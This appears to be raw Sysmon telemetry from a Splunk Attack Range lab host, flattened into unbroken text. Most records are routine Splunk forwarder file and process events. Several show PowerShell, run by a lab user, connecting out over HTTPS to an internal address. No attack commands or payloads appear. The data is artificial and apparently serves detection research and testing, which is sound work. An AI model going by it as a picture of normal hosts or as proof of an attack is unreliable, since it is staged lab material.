AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90E8B71B018A8E0171F9A5EA4AC79BCD,SHA256=CD800BE914D54D1D2B4CB5C86B49496B60F248DE242D4259AA75BC32F07DF9A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:42.476{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C7F96E0C3783CA57085D1AACD96033,SHA256=F17CB58F9D122790D94E198F86F4C965ADE9B3367AA599F38F95E58459193EBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036498618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:43.490{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBE680F63CDB77EA722B86FA002A5DE4,SHA256=8D6A94C44E3A4F9B3D6960DBE262E95758B602729A1035009EF0D6C21C2C5A3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:44.507{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6BF43FD53B21D8525F125922468B236,SHA256=5905D7AE102B3967E8B090E73E5935BB73A00F1D0860C5D7B86E534661C18E4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:16.133{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50666-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036498622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:15.880{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50665-false10.0.1.12-8000- 23542300x800000000000000036498621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:45.641{B81B27B7-4024-611D-7300-00000000C801}2188NT 
13:23:17.276{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16D8A4E5F6AEF9B0C1EA55C7AABC07A7,SHA256=2310CC56F26F81AC3DED86605AEF2C693A7F0CCCB61E79E13C464E42048FCE66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:18.295{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF551CEE3ED8BF09706DA5A0B97C4D2B,SHA256=5FF7AA360604ECE4C78C7EC40F5683A9991157498676E5F3C403C84E3108B58A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:49.902{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50678-false10.0.1.12-8000- 23542300x800000000000000036498693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:19.310{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2979910C0BFB2B0306DABC0681A5D5F,SHA256=62253002D893E3001A61CDF9B0E414E55A1903644BE8F92672E3D6EFC8197145,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036498697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:51.202{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50679-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:20.525{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E6394AA2F1828636C2B55A7DC28E7966,SHA256=B5B3C9F7BB736F3F0C59AB1CC15D6185FE40613E374244BA930DE50F2762BA05,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:20.341{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FCE83BC2DE2B4C45E62FAF3EEACA41D,SHA256=70435C05E0251AE0B1777BEFC3CFCFF1CC548E31D172B295CF70EA1E9E764852,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:21.355{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37B4C81CCB2693E33058022F1ABFA3F8,SHA256=3B1161EB42D3C9B34FC4ECF9D94187F38BB34D3BF7C596A226DF1CB351E576A5,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000036498699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:22.373{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76B46E8EFFDB50B8DD80D8F764C81250,SHA256=631B66EF89A71F21EBF046D59D0E84B6EDC3D5E07402E0F8A250CF61D8D6391B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:23.393{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53CA0818415D68F34942561583B1EC8D,SHA256=5A3C121906A835C81B40A00867F87C30EDC34409BC4F037F4B34905F86C27C40,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:23.271{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=ED1E87FAF9D3F80DD1520DDB1FE64184,SHA256=C9A59D6558416A32C6E7DC926C7A4CFEFF01B8B43ADA78DB43DE30AD3B5FC3D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.976{B81B27B7-A24C-6140-B656-04000000C801}54004848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036498720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:55.216{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50680-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036498719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.823{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A24C-6140-B656-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:23:24.823{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.823{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:23:24.823{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.823{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:23:24.823{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A24C-6140-B656-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.823{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A24C-6140-B656-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.808{B81B27B7-A24C-6140-B656-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.555{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DFF31E315E0E3DB9276F7E6F6130E72D,SHA256=DAA19C7659EF47219C6A5926907AF1FBA5CDF26C179AF2565E1B997AA454398B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.423{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=717750E5241B8D2B89BB21F1D98B2C9B,SHA256=AE26CEDBB0923ED87A57E0F362E6F244E588E1A29CBC4249B53B7D4BD4A9DAEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.123{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A24C-6140-B556-04000000C801}756C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.123{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:23:24.123{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.123{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:23:24.123{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.123{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A24C-6140-B556-04000000C801}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.123{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A24C-6140-B556-04000000C801}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.093{B81B27B7-A24C-6140-B556-04000000C801}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:25.453{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CAAFBBF5EAE3392935418B2D751DFF8,SHA256=CFBB785AA91DE5AD1DF303694221400964A85DEE867291F061F7D996A0FA093C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
